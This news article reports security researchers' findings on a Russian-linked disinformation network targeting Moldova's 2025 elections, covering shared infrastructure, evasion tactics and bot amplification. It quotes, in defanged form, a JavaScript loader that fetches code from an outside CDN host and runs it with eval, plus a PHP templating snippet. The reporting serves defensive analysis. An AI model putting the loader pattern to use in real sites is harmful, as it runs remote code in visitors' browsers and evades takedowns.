New Russian Disinformation Campaign Targeting Upcoming Moldova’s Elections

On the eve of Moldova’s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova’s pro-European leadership.

The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.

These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova’s democratic process.

Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.

Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.

Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 disinformation operation known as Absatz.

By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.

Through deep technical analysis, Silent Push analysts noted that the new sites reused several bespoke functions originally developed for the 2022 effort.

These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.

Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.

The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:-

[? php
function renderStory($ storyId) {
    $ seed = 'Storm1679';
    $ key = substr (md5($ storyId . $ seed), 0, 8);
    $ templatePath = "/var /www /html /templates /{$ key}_template[.]php";
    include($ templatePath);
}
?]

By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.

Detection Evasion and Infrastructure Persistence

The campaign’s operators demonstrated advanced persistence tactics, carefully architecting their infrastructure to evade conventional detection.

Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.

DNS records were configured with extremely short TTL values—often under five minutes—forcing security teams to constantly refresh caches and complicating takedown efforts.

In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:

[script]
  fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
    . then (res =() res[.]text())
    . then (code =() eval (code));
[/script]

This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user’s browser without touching the original domain.

By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.

To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.

The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.

Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.

As Moldova approaches the polls, this campaign underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.

Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for proactive defense measures.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.